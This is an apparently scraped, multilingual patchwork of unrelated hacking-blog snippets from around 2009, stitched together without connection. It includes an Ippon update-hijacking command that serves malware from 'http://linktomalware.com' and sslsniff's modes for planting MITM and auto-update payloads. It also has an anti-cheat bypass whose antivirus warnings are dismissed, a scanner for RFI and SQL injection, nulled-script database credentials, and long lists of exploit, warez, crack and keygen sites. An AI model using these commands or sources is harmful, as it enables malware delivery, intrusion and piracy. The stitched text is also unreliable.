Avem onoarea de a anunta cel mai vechi parteneriat: parteneriatul cu compania SC HOSTINGBIT SRL, o firma cu renume in gazduirea de servere CS 1.6, Counter-Strike Source (CSS), gazduire web, resellere, gazduire IRCd, Eggdrop, psyBNC. www.toolz.ro. Uptime garantat 99%, plata si prin SMS! Accesati acum www.toolz.ro sau sunati la 0770 852 615.
Servicii de hosting de calitate: www.toolz.ro (gazduire servere CS 1.6, CSS, WarCraft, StarCraft, Half-Life)

A new tool was announced at DEFCON17 by researchers Itzik Kotler and Tomer, Ippon compromises the automatic update mechanisms used by applications, making it think that a new update is available and instead of having the actual update, the file passed is actually a malware or rootkits. According to Kotler there are over 100 applications vulnerable to this attack.

ATTACK:
——-

./ippon.py -w -i eth1 targets.xml -v -u http://linktomalware.com

Download: IPPON_dc17.zip

http://www.ziddu.com/download/6113579/HideToolz_up_3y_REM.rar.html

ini link untuk hide cheatengine seperti MLE alias byp*** ,ga perlu gw tulis untuk apa kerja progam ini ,karena cukup bahaya kalo GM PB tau
mungkin beberapa antivirus mendeteksi ada virus ,tp fine2 aja kok
kalo ga mo khawatir pake deepfreeze aja
Credit to HideToolz Team

~miaw
-salam kucing-

Websecurify is a Web Application Security Scanner.

Here are some of the key features of Websecurify:

1. It is 100% open source, GPL, CC product, ready to benefit the open source movement
2. The engine employs technologies, such as Web Workers, from the latest HTML5 specs
3. Most of the code is written in JavaScript but many parts can be rewritten or extended with Python, Java and C
4. The core engine can be taken out from the binary bundles and used as part of self-defending web applications. I will talk about this soon.
5. The testing and reporting mechanisms are asynchronous. This means that the report is cooking while the test is performed. It also means that decisions are taken immediately, i.e. they are not scheduled.
6. The tool is cross-platformed thanks to xulrunner
7. Everything is written with extensibility in mind
8. It can be extended in pretty much the same way you can extend Firefox and Thunderbird

Download: websecurify.dmg
Download: websecurify.source

Xplico is an open source Network Forensic Analysis Tool (NFAT) that allows for data extraction from traffic captures. It supports extraction of mail from POP, IMAP, and SMTP, can extract VoIP streams, etc. This is the version that has a GUI allowing you to view photos, texts and videos contained in MMS messages.

Dissectors: Ethernet, pcap, ipv4, ipv6, PPP, sll, tcp (2 type), udp, dns, ftp, http, icmp, imap, ipp, mms, pjl (Printer Job Language), pop, sdp, smtp, tftp, l2tp (instable), vlan (instable).
Reverse dns using only the DNS traffic in the PCAP file.

Website: www.xplico.org
Download: xplico-0.5.2.tgz

Version 0.6 has been significantly updated to additionally support the null-prefix attacks that I demonstrated at BlackHat 09 and Defcon 17. These allow for completely silent MITM attacks against SSL/TLS in the NSS, Microsoft CryptoAPI, and GnuTLS stacks — ultimately allowing for SSL communication in Firefox, Internet Explorer, Chrome, Thunderbird, Outlook, Evolution, Pidgin, AIM, irssi, and every other client that uses the Microsoft CryptoAPI to be intercepted.

sslsniff has also been updated to support the OCSP attacks that I published at Blackhat 09 and Defcon 17, thus making the revocation of null-prefix certificates very difficult. Additionally, sslsniff now supports modes for hijacking auto-updates from Mozilla products, as well as for Firefox/Thunderbird addons. Attackers can specify payloads of their choice, which will be delivered to the targets being man-in-the-middled.

sslsniff is useful for deploying other vulnerabilities as well. This is the tool that the people who pulled the recent MD5 hash collision publicity stunt used to demonstrate MITM attacks with their rogue CA-certificate. Also, anyone who is capable of obtaining a forged certificate by any means can easily deploy it through sslsniff with the targeted mode designed for null-prefix attacks.

Read the: Paper
Watch the: Video
Download the: Tool

N.E.R.D – She Wants to Move (Mac & Toolz Remix)

passw0rd.info

http://www.passw0rd.info

Yeni Sitem

This is a fun little tool, Use as you want.

This wasn’t created by me, I’m just simply sharing it around.

It should be pretty straight forward but if you have any question just PM me.

Download link – CLICK HERE

Scan as you wish, The file is clean…

Antivir: Nothing found
ArcaVir: Nothing found
Avast: Nothing found
AVG: Nothing found
BitDefender: Nothing found
F-Prot: Nothing found
Norman: Nothing found
Rising: Nothing found
VirusBlokAda32: Nothing found
VirusBuster: Nothing found

this is yet another test

http://rapidshare.com/files/144569557/Scanner_Xroot.rar.html

GüzeL bi tools rfi veya mysql injection arayabilirsiniz

http://filmizle.gen.tr/

<?php
// Your MySQL database host (usually “localhost”)
$db_host = “localhost”;
// Your MySQL database username
$db_user = “sprocu_db”;
// Your MySQL database password
$db_pass = “123654″;
// Your MySQL database name
$db_name = “sprocu_db”;
// License key
$license_key = “nulled by gyzyw (team STN)”;
?>

Databasasi bendedir Film sitesi acmak isteyen aRkadasLara ideal bir database

fiyatı : 20 ytL

Cok guzeL bir Rfi Scanner hem GoogLe aRama yapıyoR hemde Rfileri buLuyor

http://rapidshare.com/files/154579323/TH1NK3R_Searcher.rar.html

Sabneq ~ LaqNes ~ aŞot BuzuL Lamerini TekRardan hacklediLer. LaqNes ve Sabneq SanaLı bırakmadan buzuLu hackLeyekte öLe gidek demişLer Saten sanaLı  her bırakan buzuLa cakıpta gidiyoR Hea bu aRada Aşot yaptıgı Track mükemmeL ötesi tavsiye ederim.

Karena kemarin ada yang minta artikel 10 antivirus teratas, jadi aku kasih artikelnya.

TopTenREVIEWS mengumumkan dari hasil benchmark-nya, mereka adalah :

1. BitDefender
2. Kaspersky
3. F-Secure Anti-Virus
4. PC-cillin
5. ESET NOD32
6. McAfee VirusScan
7. Norton AntiVirus
8. AVG AntiVirus
9. eTrust EZ Antivirus
10. Norman Virus Control

Apakah anti virus anda termasuk 10 antivirus teratas?

Heute hab ich eine Liste für euch mit den wichtigsten Seiten zu den Themen:

• Hacking
• Toolz
• Exploitz
• Warez & Suchmaschinen
• Torrentz/Serials
• Software Cracking
• Online Hash Cracker
• Proxy’s
• Hardware
• 1-Klick-Hoster
• Spreader
• Image-Hoster

Seht es einfach als Ergänzung an zu den “Most needed Links”

Hacking

http://www.milw0rm.com

http://www.buha.info

http://www.hackerboard.de

http://www.fette-toolz.da.ru

http://www.hacker-toolz.info

http://www.hackersoftware.ch.vu

http://www.bifrostworld.dl.am

http://www.h4cky0u.org

http://www.igniteds.net

Toolz

http://www.dlbaze.dl.am

http://sectools.org/

http://www.computec.ch/

http://www.elhacker.org/

http://www.packetstormsecurity.org/

http://www.88kb.de.vu/

http://www.hackersoftware.ch.vu/

http://fette-toolz.da.ru/

http://www.chaoshacker.de/

Exploitz

http://www.packetstormsecurity.org/

http://www.frsirt.com/exploits/

http://www.insecure.org/

http://www.securityfocus.com/archive/

http://secwatch.org/

http://www.milw0rm.com/

http://www.governmentsecurity.org/exploits.php

http://www.securiteam.com/securitynews

http://www.gcf.de/?show=exploit

http://www.buha.info/files/user/html/main_Exploits.html

http://www.secwatch.org/exploits/

http://www.astalavista.com

http://www.opennet.ru

http://www.osvdb.org/

http://www.security.nnov.ru/exploits/

http://www.guninski.com

http://www.heise.de/security/

http://www.exploitdatabase.com/

Warez

http://www.3dl.am

http://www.board.divxvid.org

http://www.ddl-board.com

http://www.ddl-warez.cc

http://www.bloodsuckerz.da.cx

http://www.steelwarez.com

http://www.diebe.org

http://www.warez-bb.org

http://www.ddl2.com

http://www.dlbase.in

http://www.9down.com

http://www.phazeddl.com

http://www.satanwarez.com

Warez Suchmaschinen

http://www.phazeddl.com

http://www.woom.ws

http://www.collectr.net

Torrents

http://www.torrentreactor.net

http://www.torrent.to

http://www.torrents.to

http://thepiratebay.org

http://bitreactor.to

Crackz/Serialz

http://www.crackspider.net

http://www.serials.ws

http://www.freeserials.com

http://www.crack.ru

http://www.serials.to

http://www.gamecopyworld.com

http://www.cracks.am

http://www.keygen.ru

http://www.keygen.us

http://www.lomalka.ru

http://www.keygen.ws

http://www.crackfind.com

http://www.astakiller.com

http://www.astalavista.ms

http://www.easycracks.net

http://astalavista.box.sk

Software Cracking

http://www.tuts4you.com

http://www.cracking.accessroot.com

Online Hash Cracker

http://www.md5cracker.de/

http://www.milw0rm.com/cracker/

http://gdataonline.com/seekhash.php

http://md5.rednoize.com

http://www.plain-text.info/add

http://www.md5jack.net/md5check.php

http://www.securitystats.com/tools/hashcrack.php

http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/

http://www.tmto.org/?category=main&page=search_md5

http://md5crack.it-helpnet.de/index.php?op=add

http://www.csthis.com/md5/index.php

http://www.xmd5.org/index_en.htm

http://us.md5.crysm.net/

http://www.tydal.nu/php/sakerhet/md5.php

http://www.cmd5.com/english.aspx

http://alimamed.pp.ru/md5/?md5e=&md5d=password

http://ice.breaker.free.fr/

http://schwett.com/md5/

http://www.xeons.net/genesis/

Proxy’s

http://www.aliveproxy.com

http://www.proxy-world.de

http://www.proxy4free.com

http://www.publicproxyservers.com

http://www.samair.ru

FTP Suchmaschinen

http://www.reliz.ru

http://www.oth.net

http://www.fileindexer.com

http://www.filesearching.com

http://www.freewareweb.com/ftpsearch.shtml

http://oth2.net

http://pliki.onet.pl

http://filewatcher.org

http://ftpsearch.elmundo.es

http://search.ftphost.net/indexer/search.htm

http://ftpsearch.rambler.ru/db/ftpsearch/search.html

Hardware

http://www.snogard.de

http://www.kmelektronik.de

http://www.avitos.com

http://www.e-bug.de/

http://www.mindfactory.de

http://www.primustronix.de

http://www.bestsellercomputer.de

http://www.alternate.de

http://www.csv-direct.de

http://www.hoh.de

http://www.vv-computer.de

http://www.mix-computer.de

http://www.fortknox.de/

http://www.komplett.de

http://www.computeruniverse.net

http://www.pcaktion.de/

http://www.yellochip.de

http://www.jes-computer.de/

http://www.ichbinleise.de/

http://www.nordpc.de/

http://www.inter-tech.de

http://www.mb-it.de/

http://www.hardwareschotte.de

http://www.one.de –> mein Favorit

Online Anonymizer

(ohne Anmeldung)

http://hujiko.com/

http://www.megaproxy.com/freesurf

http://www.the-cloak.com/

http://anonymouse.org/

http://www.guardster.com/subscription/proxy_free.php

http://www.anonymization.net/

http://www.proxy.org

1-Klick-Hoster

http://rapidshare.com –> Katzen Captchas =(

http://meinupload.com/

http://www.filefactory.com/

http://www.files.to/

http://s4.simpleupload.de/

http://s2.netload.us/upload.php

http://www.filestore.cc/

http://www.datenklo.net/

http://www.files.to/

http://www.silo.ru/

http://bluehost.to/

Die beiden besten Spreader:

http://youmirror.biz/

http://xirror.com/

Image-Hoster:

http://imageshack.us/

http://imagebanana.de

http://www.abload.de/

http://www.bilder-hochladen.net/ –> email nötig

http://www.image-upload.biz/

Ich werde immer mal wieder was hinzufügen. Bitte meldet die Fehler!! Danke =)

Vi segnalo due interessanti tool che potrbbero facilitarvi il lavoro in caso andiate alla ricerca di possibili SQLinjections ed XSS: XSSme e SQL Inject-Me.

L’azienda Security Compass rilascia gratuitamente (sotto licenza GPL) questi due tool sotto forma di estensioni firefox (intanto la mia GUI di firefox diventa sempre più grassa ^^) insieme ad alcune informazioni relative ad il loro utilizzo.

Questi due semplici tool vi permettono di testare le vulnerabilità di una pagina web basandosi su una base di Vettori già noti listati in file xml inclusi nelle distribuzioni.

Estendere questi file è molto semplice, basta infatti ciccare il menu opzioni e nel pannello Strings aggiungere manualmente i vostri vettori javascript o codice SQL.
Potete anche aggiungere direttamente un altro listato xml contenente le vulnerabilità scoperte da qualcunaltro, così da permettere la condivisione di stringhe di attacco.

Sul sito della società è già incluso un file XML pronto da scaricare.